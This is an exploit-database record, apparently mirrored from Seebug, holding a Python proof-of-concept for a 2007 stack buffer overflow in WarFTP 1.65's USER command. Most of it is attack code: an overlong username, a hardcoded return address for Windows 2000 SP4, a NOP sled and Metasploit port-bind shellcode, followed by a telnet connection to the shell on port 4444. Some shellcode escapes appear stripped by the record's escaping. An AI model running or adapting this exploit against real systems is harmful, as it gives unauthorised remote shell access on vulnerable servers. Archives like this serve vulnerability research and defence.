Description
No description provided by source.
{"sourceData": "\n #!/usr/bin/python\r\n#\u00a0Remote\u00a0exploit\u00a0for\u00a0WarFTP\u00a01.65.\u00a0Tested\u00a0on\u00a0Windows\u00a02000\u00a0server\u00a0SP4\u00a0inside\r\n#\u00a0VMware.\u00a0A\u00a0trivially\u00a0exploitable\u00a0stack\u00a0overflow\u00a0is\u00a0present\u00a0in\u00a0WarFTP\u00a0which\r\n#\u00a0can\u00a0be\u00a0triggered\u00a0by\u00a0sending\u00a0a\u00a0long\u00a0username\u00a0(>480\u00a0bytes)\u00a0along\u00a0with\u00a0the\u00a0USER\r\n#\u00a0ftp\u00a0command.\u00a0Maybe\u00a0other\u00a0commands\u00a0like\u00a0PASS\u00a0might\u00a0also\u00a0be\u00a0affected.\u00a0I\u00a0did\r\n#\u00a0not\u00a0check\u00a0though.\u00a0This\u00a0exploit\u00a0binds\u00a0shell\u00a0on\u00a0TCP\u00a0port\u00a04444\u00a0and\u00a0then\r\n#\u00a0connects\u00a0to\u00a0it\r\n#\r\n#\u00a0Author\u00a0shall\u00a0not\u00a0bear\u00a0any\u00a0responsibility\u00a0for\u00a0any\u00a0screw\u00a0ups\r\n#\u00a0Winny\u00a0Thomas\u00a0:-)\r\n\r\nimport\u00a0os\r\nimport\u00a0sys\r\nimport\u00a0time\r\nimport\u00a0socket\r\nimport\u00a0struct\r\n\r\n#\u00a0alphanumeric\u00a0portbind\u00a0shellcode\u00a0from\u00a0metasploit\r\nshellcode\u00a0\u00a0=\u00a0\\"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49\\"\r\nshellcode\u00a0+=\u00a0\\"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36\\"\r\nshellcode\u00a0+=\u00a0\\"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34\\"\r\nshellcode\u00a0+=\u00a0\\"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41\\"\r\nshellcode\u00a0+=\u00a0\\"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e\\"\r\nshellcode\u00a0+=\u00a0\\"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx58\\"\r\nshellcode\u00a0+=\u00a0\\"x4ex56x46x42x46x42x4bx58x45x54x4ex53x4bx48x4ex57\\"\r\nshellcode\u00a0+=\u00a0\\"x45x30x4ax47x41x30x4fx4ex4bx48x4fx44x4ax51x4bx38\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx55x42x32x41x50x4bx4ex49x44x4bx58x46x33x4bx58\\"\r\nshellcode\u00a0+=\u00a0\\"x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x48x42x4c\\"\r\nshellcode\u00a0+=\u00a0\\"x46x37x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e\\"\r\nshellcode\u00a0+=\u00a0\\"x46x4fx4bx53x46x35x46x52x4ax42x45x57x45x4ex4bx48\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx45x46x52x41x30x4bx4ex48x46x4bx38x4ex50x4bx54\\"\r\nshellcode\u00a0+=\u00a0\\"x4bx48x4fx45x4ex41x41x30x4bx4ex43x30x4ex32x4bx58\\"\r\nshellcode\u00a0+=\u00a0\\"x49x48x4ex36x46x42x4ex41x41x56x43x4cx41x53x4bx4d\\"\r\nshellcode\u00a0+=\u00a0\\"x46x56x4bx38x43x54x42x43x4bx58x42x44x4ex30x4bx38\\"\r\nshellcode\u00a0+=\u00a0\\"x42x47x4ex41x4dx4ax4bx58x42x44x4ax30x50x55x4ax56\\"\r\nshellcode\u00a0+=\u00a0\\"x50x48x50x34x50x30x4ex4ex42x45x4fx4fx48x4dx48x36\\"\r\nshellcode\u00a0+=\u00a0\\"x43x45x48x56x4ax46x43x53x44x33x4ax46x47x37x43x57\\"\r\nshellcode\u00a0+=\u00a0\\"x44x33x4fx35x46x35x4fx4fx42x4dx4ax36x4bx4cx4dx4e\\"\r\nshellcode\u00a0+=\u00a0\\"x4ex4fx4bx53x42x45x4fx4fx48x4dx4fx35x49x38x45x4e\\"\r\nshellcode\u00a0+=\u00a0\\"x48x46x41x58x4dx4ex4ax30x44x30x45x35x4cx36x44x30\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x35\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx48x4dx43x35x43x45x43x55x43x45x43x35x43x34\\"\r\nshellcode\u00a0+=\u00a0\\"x43x55x43x34x43x45x4fx4fx42x4dx48x46x4ax36x41x41\\"\r\nshellcode\u00a0+=\u00a0\\"x4ex45x48x36x43x45x49x58x41x4ex45x39x4ax56x46x4a\\"\r\nshellcode\u00a0+=\u00a0\\"x4cx31x42x37x47x4cx47x45x4fx4fx48x4dx4cx46x42x31\\"\r\nshellcode\u00a0+=\u00a0\\"x41x55x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42\\"\r\nshellcode\u00a0+=\u00a0\\"x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x4ax36x45x4ex49x54x48x58x49x44x47x55x4fx4fx48x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x42x55x46x35x46x35x45x35x4fx4fx42x4dx43x39x4ax56\\"\r\nshellcode\u00a0+=\u00a0\\"x47x4ex49x47x48x4cx49x37x47x45x4fx4fx48x4dx45x45\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx42x4dx48x46x4cx36x46x56x48x36x4ax46x43x46\\"\r\nshellcode\u00a0+=\u00a0\\"x4dx46x49x58x45x4ex4cx56x42x35x49x55x49x52x4ex4c\\"\r\nshellcode\u00a0+=\u00a0\\"x49x38x47x4ex4cx56x46x54x49x58x44x4ex41x53x42x4c\\"\r\nshellcode\u00a0+=\u00a0\\"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x34x4ex32\\"\r\nshellcode\u00a0+=\u00a0\\"x43x49x4dx48x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax36\\"\r\nshellcode\u00a0+=\u00a0\\"x44x47x50x4fx43x4bx48x41x4fx4fx45x57x46x34x4fx4f\\"\r\nshellcode\u00a0+=\u00a0\\"x48x4dx4bx45x47x55x44x55x41x45x41x35x41x55x4cx36\\"\r\nshellcode\u00a0+=\u00a0\\"x41x30x41x35x41x55x45x45x41x45x4fx4fx42x4dx4ax56\\"\r\nshellcode\u00a0+=\u00a0\\"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx56\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx4fx4fx47x33x4fx4fx42x4dx4bx38x47x55x4ex4f\\"\r\nshellcode\u00a0+=\u00a0\\"x43x48x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x4ax46x42x4fx4cx48x46x50x4fx45x43x55x4fx4fx48x4d\\"\r\nshellcode\u00a0+=\u00a0\\"x4fx4fx42x4dx5ax90x90x90x90x90x90x90x90x90x90x90\\"\r\n\r\ndef\u00a0ConnectRemoteShell(target):\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0connect\u00a0=\u00a0\\"/usr/bin/telnet\u00a0\\"\u00a0+\u00a0target\u00a0+\u00a0\\"\u00a04444\\"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0os.system(connect)\r\n\r\ndef\u00a0ExploitFTP(target):\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0sockAddr\u00a0=\u00a0(target,\u00a021)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0tsock\u00a0=\u00a0socket.socket(socket.AF_INET,\u00a0socket.SOCK_STREAM)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0tsock.connect(sockAddr)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0response\u00a0=\u00a0tsock.recv(1024)\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\u00a0At\u00a0the\u00a0time\u00a0of\u00a0overflow\u00a0EBP\u00a0points\u00a0to\u00a0our\u00a0shellcode\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0=\u00a0\\"USER\u00a0\\"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0\\"A\\"\u00a0*\u00a0485\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\u00a0Point\u00a0of\u00a0EIP\u00a0overwrite.\u00a0Address\u00a0of\u00a0\\'call\u00a0ebp\\'\u00a0from\u00a0user32.dll\u00a0SP4.\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0struct.pack(\\"<L\\",\u00a00x77E14709)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0\\"x90\\"\u00a0*\u00a0100\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0shellcode\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload\u00a0+=\u00a0\\"\r\n\\"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0tsock.send(payload)\r\n\r\nif\u00a0__name__\u00a0==\u00a0\\'__main__\\':\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0target\u00a0=\u00a0sys.argv[1]\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0except\u00a0IndexError:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0print\u00a0\\'Usage:\u00a0%s\u00a0<target>\\'\u00a0%\u00a0sys.argv[0]\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0sys.exit(-1)\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ExploitFTP(target)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0time.sleep(2)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ConnectRemoteShell(target)\r\n\r\n\u00a0\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-6390", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-6390", "type": "seebug", "viewCount": 8, "references": [], "lastseen": "2017-11-19T22:07:59", "published": "2007-03-15T00:00:00", "cvelist": [], "id": "SSV:6390", "enchantments_done": [], "modified": "2007-03-15T00:00:00", "title": "WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645300954, "score": 1659785532, "epss": 1678851499}}
{}
WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)